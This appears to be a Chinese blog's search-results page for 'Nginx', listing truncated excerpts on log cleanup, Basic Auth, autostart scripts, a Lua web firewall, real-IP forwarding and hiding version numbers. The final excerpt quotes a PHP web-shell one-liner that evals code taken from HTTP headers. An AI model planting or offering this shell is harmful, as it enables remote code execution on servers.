搜索 “Nginx”

Nginx在涉及大流量时，会发生非常庞大的日志文件，包含access.log和error.log，日志会随着连接不断增加，到无限大。如果日志文件太大，会导致Nginx运行缓慢，卡顿，也是存储资源的浪费。 比如体验盒子服务器的Nginx日志文件 手动释放清理Nginx日志文件access.log 查看并查找相关信息及路径 # ...

Nginx配置Basic Auth登录认证 有时候我们通过nginx搭建了一台文件服务器, 一般来讲是公开的, 但我们又希望该服务器不让他人看到, 有人可能会搭建一个登录系统, 但是太麻烦, 也没太大必要, 比较简单的做法是配置Basic Auth登录认证（ngx_http_auth_basic_module）。 Nginx站点用户名密码难 nginx编译时默认已经包含这个模块，我们只...

CentOS7/Linux开机自启动 懒人运维必备get，服务器每次重启，都需要手动启动一些服务，快用脚本来提升一点效率吧，体验盒子分享三个（nginx/php/mysql）最常用的开机自启动脚本。开机自启动的实现是通过服务管理来控制的。 Linux服务管理service和systemctl CentOS 7继承了RHEL 7的新的特性，例如强大的systemctl，systemctl服务管...

ngx_lua_waf web应用防火墙 ngx_lua_waf是一个基于OpenResty（Nginx+Lua）的web应用防火墙。而ngx_lua是一种可以把lua语言嵌入nginx中，使其支持lua来快速开发基于nginx下的业务逻辑的技术。 实现功能 防止sql注入，本地包含，部分溢出，fuzzing测试，xss,SSRF等web攻击防止svn/备份之类文件泄漏防止ApacheBench之类压力测试工...

当经过N个nginx代理时，Server端如何拿到Client端端真实IP？ # 环境 client_ip：10.10.10.1 proxy_server_1：10.10.10.16 proxy_server_2：10.10.10.17 web_server：10.10.10.18 12345678 # 环境 client_ip：10.10.10.1 proxy_server_1：10.10.10.16...

场景描述 A站点HTTPS，A站点做为中心站，引用B/C/D/E/F……站点的资源进行供给，确定的只有A站点是HTTPS，其它站点可能是HTTP也可能是HTTPS，文件类型不限定，包括但不限于：CSS,JS,IMAGE,MP4,MP3,RAR,ZIP,M3U8,FLV……。 如果你使用的是默认配置，那么它会提示以下错误： Access to XMLHttpRequest at '...

隐藏版本号 http { server_tokens off; } 123 http {    server_tokens off;} 经常会有针对某个版本的nginx安全漏洞出现，隐藏nginx版本号就成了主要的安全优化手段之一，当然最重要的是及时升级修复漏洞 开启...

环境函数用法nginxget_defined_vars()返回由所有已定义变量所组成的数组apachegetallheaders()获取全部 HTTP 请求头信息 apache环境 <?php eval(next(getallheaders())); ?> 123 <?phpeval(next(getallheaders())); ?> ...